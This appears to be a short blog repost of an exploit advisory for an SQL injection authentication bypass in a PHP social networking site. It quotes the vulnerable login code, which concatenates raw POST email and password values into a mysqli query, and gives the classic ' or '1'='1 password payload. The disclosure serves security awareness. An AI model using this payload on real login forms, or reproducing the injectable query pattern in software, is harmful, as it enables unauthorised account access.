Social Networking Site – Authentication Bypass (SQli)

Date: 2020-12-01


Platform: PHP

# Exploit Title: Social Networking Site - Authentication Bypass (SQli)
# Exploit Author: gh1mau 
# Email:
# Team Members: Capt'N, muzzo, chaos689 |
# Vendor Homepage:
# Software Link:
# Software Release Date: November 17, 2020
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:

Vulnerable Code:
Entry point:

line 7: $email=$_POST['email'];
line 8: $password=$_POST['password'];

Exit point:
line 10: $result = mysqli_query($con,"SELECT * FROM user WHERE email = '$email' and password='$password'");

Vulnerable Issue:
Attacker could bypass the authentication using simple sqli login bypass payload

	password: ' or '1'='1
Social Comments Box
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  Online Shopping Alphaware 1.0 - Error Based SQL injection


Just your average information security researcher from Delaware US.

Leave a Reply

Your email address will not be published. Required fields are marked *